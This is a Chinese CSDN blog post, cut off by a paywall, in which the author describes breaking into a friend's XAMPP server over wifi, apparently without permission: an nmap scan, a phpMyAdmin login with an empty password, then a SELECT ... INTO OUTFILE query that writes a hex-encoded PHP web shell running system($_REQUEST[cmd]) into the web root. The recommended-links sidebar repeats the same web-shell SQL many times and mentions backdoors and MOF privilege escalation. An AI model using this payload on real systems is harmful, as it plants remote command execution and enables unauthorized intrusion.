mysql 提权_Mysql提权留后门

最新推荐文章于 2021-02-02 04:49:22 发布
最新推荐文章于 2021-02-02 04:49:22 发布
阅读量183 收藏
点赞数
文章标签: mysql 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33532301/article/details/113115128
版权

记录一次关于无聊时对基友MYSQL服务器的提权攻击。

尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。

0x01.从无聊的nmap扫描开始

今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。

2014-12-27-hack-mysql-1.png

看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。

2014-12-27-hack-mysql-2.png

登进去后,就想办法留个后门,搞个木马。注意一下,mysql是以管理员权限运行的,so...

查了下资料,这个很简单,网上很多。

找个一个表进去,用下面那句话,就搞定了。

SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E FROM user into outfile '/Applications/XAMPP/xamppfiles/phpmyadmin/fuck.php'

那一串字符就是 <?php system($_REQUEST[cmd]);?> 的十六进制编码了,

最低0.47元/天 解锁文章
隔壁林同学
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 数据库后门,运用Mysql语句生成后门木马的具体方法
weixin_35460054的博客
03-17 783
通过Mysql 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
利用Mysql into outfile给网站后门
xlxxcc的专栏
09-23 9646
Mysql into outfile使用Mysql into outfile语句,可以方便导出表格的数据。同样也可以生成某些文件。因此有些人会利用sql注入生成特定代码的文件,然后执行这些文件。将会造成严重的后果。Mysql into outfile 生成PHP文件SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3
mysql会有后门吗_MySQL 语句来生成后门木马的实际操作方案
weixin_35907524的博客
02-02 115
此文章主要向大家描述的是正确通过MySQL 语句来生成后门木马的实际操作方法,以下就是通过MySQL 语句来生成后门木马的实际操作方法具体方案的描述,希望在你今后的学习中会有所帮助。通过MySQL语句生成后门木马的方法!SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F52455...
通过Mysql 的语句生成后门木马的方法!
03-26 1376
通过Mysql 的语句生成后门木马的方法!SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile c:/inetpub/wwwroot/cmd.php
mysql会有后门吗_mysql的语句也能生成后门木马
weixin_31787977的博客
02-01 100
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php';通过Mysql 的注入或者在 phpmyadm...
PHP、mysql(手工注入)
10-12
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
NFine快速开发框架Mysql版去后门
01-09
1、原版NFine框架经过修改,由Ms SqlServer数据库改成MySQL数据库,去掉原版的后门连接,后门连接在Js文件包含“aWZyYW1lanMwMDAwMQ”字串的函数中 2、数据库驱动采用EF6的MySql.Data.EntityFramework 和MySql.Data...
Nfine Mysql 版本
09-12
网上下载的N-fine 去后门的版本,由于使用是的是SQLSERVER 部署起来不方便,所以花了两天时间修改了数据访问层,原先用EF框架,修改成Mysql ODBC访问,并且增加自动创建MYSQL表的功能。测试了一下可以访问,密码 ...
mysql5.7.1资源文件
11-03
mysql5.71资源文件 csdn上太多手积分的了 给自己后门以后用。
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
最新发布
07-22
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
mysql会有后门吗_Mysql的语句生成后门木马的方法
weixin_42390525的博客
02-02 174
咳咳,大家看看就好了,本人不负责所产生的后果SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过...
运用Mysql语句生成后门木马详解
cstcqbeh92120的博客
07-30 133
通过Mysql 的语句生成后门木马的方法: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551...
mysql 5.x触发器后门
weixin_34279246的博客
12-28 140
触发器参考资料:http://blog.csdn.net/lazy_p/archive/2009/12/25/5076114.aspx 基本语法: CREATE TRIGGER <触发器名称> { BEFORE | AFTER } <– { INSERT | UPDATE | DELETE } ON <表名称> FOR EACH R...
运用Mysql语句生成后门木马的具体方法
zgqtxwd的专栏
04-29 373
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
Linux 多个后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
mysql定时木马_Mysql的语句生成后门木马的方法
weixin_39926639的博客
01-18 98
咳咳,大家看看就好了,本人不负责所产生的后果复制代码 代码如下:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/...
[网络安全自学篇] 九十五.利用XAMPP任意命令执行提升权限(CVE-2020-11107)及防御措施
杨秀璋的专栏
09-16 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC。这篇文章将复现CVE-2020-11107漏洞,利用XAMPP任意命令执行漏洞提升权限,希望对您有所帮助。
mysql mof提权原理_mof提权原理及其过程
05-16
Mof文件是一种WMI(Windows Management Instrumentation)的文件格式,用于描述WMI类和实例,其中包含了一些WMI类的定义和方法,可以通过WMI来执行一些系统管理的任务。而Mof提权则是一种利用Mof文件来提升权限的攻击方式。 Mof提权的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,其中包含一个“CreationClassName”属性,用于指定类的创建者。 2. 注册Mof文件到WMI中,使用“mofcomp.exe”工具将Mof文件编译成WMI可识别的格式,并使用“wmic.exe”工具将其注册到WMI中。 3. 当用户登录系统时,WMI会自动执行Mof文件中的代码,并将当前用户的权限提升为“SYSTEM”级别,从而实现提权。 需要注意的是,Mof提权需要具备本地管理员权限才能执行,因此其攻击范围相对有限。为了防止Mof提权攻击,可以使用安全软件对系统进行监控和防护,及时发现和阻止恶意Mof文件的注册和执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值